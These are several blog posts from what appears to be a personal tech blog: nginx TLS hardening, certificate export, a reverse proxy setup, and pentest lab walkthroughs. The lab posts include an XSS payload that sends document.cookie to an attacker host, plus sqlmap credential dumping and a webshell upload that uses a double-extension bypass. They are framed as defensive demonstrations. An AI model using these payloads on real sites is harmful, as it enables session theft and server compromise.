I was testing one of my sites using both securityheaders and ssllabs and found that I was being marked down due to weak Diffie-Hellman key exchange, and due to supporting certain weak cryptographic algorithms
I was determined to get an A+ for both sites, and with a bit of trial and error this is how to configure nginx to use strong Diffie-Hillman Parameters, and force the server to only use certain algorithms.
If you are using a proxy as per our other tutorials you will need to treat this new .pem file as you do the web certificate. You need to create it on the Web server then move a copy to the proxy server and point to it as you would with your .cer and.key files. However the “ssl_ciphers” entry only needs to be on the web server. If this example our site is named ‘site1.com’
To create our new Diffie-Hellman parameters, on the webserver we run sudo openssl dhparam -out dhsite1params.pem 2048
This will create our .pem file, which we then move to the same location as our .key and .cer files so they can be easily referenced.
The line we need to add is "ssl_dhparam /etc/nginx/dh/dhsite1params.pem;"
To ensure we are only using strong encryption ciphers we also need to add a few more lines to our site file.
If a previous post we set up a reverse proxy server see here for the tutorial.
Now we need to configure our sites for HTTPS.
For this to work correctly with no browser warnings when visiting the sites we need the website certificates and private key on both the reverse proxy server and the web server behind. Then we referrence them in the site files.
To configure HTTPS for your nginx server you can follow the tutorial here
Always bypass the proxy during configuration to make sure the site is working correctly over https before moving onto configuring the reverse proxy.
Once you have confirmed your site is working, you need to copy over the certificate and private key over to the reverse proxy server. In this case we put them in a directory’s named /cert/crt and /cert/key.
Open the virtual host file for each site, which if you followed the previous tutorials would be like so.
Recently I was playing around with Proxy Servers and while trying to get a HTTPS site working I needed to export my SSL Certificate from an IIS server for use on a Linux Server. Windows exports to a .pfx extension which won’t work in linux, and I would also need to extract the private key.
After a bit of googling I found the answer.
From The Windows machine.
From Start Menu click RUN then type mmc
Click FILE >> Add/Remove Snap-In
Click Certificates >> Add
Choose Computer Account
Click Next then select Local Computer and then Finish
Use + to expand the Local Computer Certificates console tree, go to the Personal directory and expand thye Certificates folder.
Right click the Certificate you need and choose All Tasks >> Export
Choose Yes, export private key and Include all certificates in certificate path if possible. (You don’t want to delete the private key unless you are SURE that you won’t need it on the server anymore. If unsure just leave it.)
Leave all other settings, and set a password. (don’t forget it!)
Save the .pfx file in your chosen location.
Now to import to Linux
Copy the .pfx file over to your Linux Server using your preferred method.
Then run the following commands. (using your file name in place of “yourcertfile”) sudo openssl pkcs12 -in yourcertfile.pfx -clcerts nokeys -out newcertfile.cer sudo openssl pkcs12 -in yourcertfile.pfx -nocerts -nodes -out newkeyfile.key
Now you have 2 new files, one .cer which is your certificate, and a .key which is your private key file.
Last thing is to delete the .pfx file from the Linux server. You don’t want copies of this lying around if they aren’t needed. If you do need to keep a copy, then copy it onto an encrypted USB and keep it safe.
To delete from your Linux server, from the directory it is located just use sudo rm yourcertfile.pfx
I’m a big fan of Ubuntu and nginx, and in this post we are going to set up a server as a reverse proxy server.
What is, and why would you need, a reverse proxy server?
A reverse proxy server sits between the internet and your web servers to processes requests, perform load balancing and caching if required.
A reverse proxy server can also be used if you only have one external IP address but you want to run multiple websites. Now you can use port forwarding and assign ports for each site but I find this messy, takes more configuration and less than ideal. I don’t want my url to be https://2code-monte.co.uk:8080 for example.
Let’s get to it. In this example we have 1 external IP address but we want to have 2 external websites named “site1.com” which has an internal IP of 220.127.116.11, and “site2.com” which has an internal IP of 18.104.22.168.
On your Ubuntu Server install nginx sudo apt-get install nginx
Then create a virtual host file for each site. sudo nano /etc/nginx/sites-available/site1
Enter the following text into the file and save. Then repeat for site2 but replace “server_name” and “proxy_pass” with the appropriate details for site2.
In order for the sites to be available we need to create a link to the sites-enabled directory. sudo ln -s /etc/nginx/sites-available/site1 /etc/nginx/sites-enabled/site1 sudo ln -s /etc/nginx/sites-available/site2 /etc/nginx/sites-enabled/site2
It’s always good to test your configuration after any changes, you do this like so. sudo nginx -t
Then we need to restart nginx sudo systemctl reload nginx
Next we want to lock the server down as it will be proxying all web traffic so we want to make sure our firewall is enabled and only the required ports are open.
In this example we are only running http sites so we only need port 80 open, unless you are connecting via ssh to administer the server.
We are using ufw sudo ufw enable sudo ufw allow http
If ssh is needed sudo ufw allow ssh
You can now check that only the required ports are open by using sudo ufw status
You should get something like this:
80 ALLOW Anywhere
80 (v6) ALLOW Anywhere
If you have also enabled ssh it will also show up twice.
That’s it. All that is left to do is ensure all web traffic to your external IP goes to the proxy server and it will forward the request. You can add more sites by creating new virtual host files for each new site, but don’t forget to link them to the sites-enabled directory.
In an up-coming post we will show you how to use https sites over your new nginx proxy server.
Here we demonstrate why you should be filtering any user input.
This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.
First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.
By enclosing the following in script tags “document.write(‘<img src=”http://192.168.56.104/?’+document.cookie+’ “/>’);” we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel and from there we can add malicious code, create new users or look to get root access on the server.
The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.
To demostrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com
In this video we start off by using “wget” to clone the site we are attacking so when users are redirected to our site they are less suspicious as any differences are subtle, and wont generally be noticed by normal users. Then we load the cloned pages on our webserver. For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (Poisoning the host file or typo-squatting is a whole tutorial by itself).
Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points to so it sends users to our clone site rather then the correct login page.
We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.
Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.
This will be in two parts. The first will show how using a tool called sqlmap we can carry out successful SLQ Injection, and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.
Then once we have access to the admin section, we upload our php shell, but the site has some basic filtering so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml” which gets us past the filtering controls. It also shows why even in password protected areas of your site you still need rubust upload controls. It means if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.
This video ends with us logging into the uploaded webshell and accessing the www directory.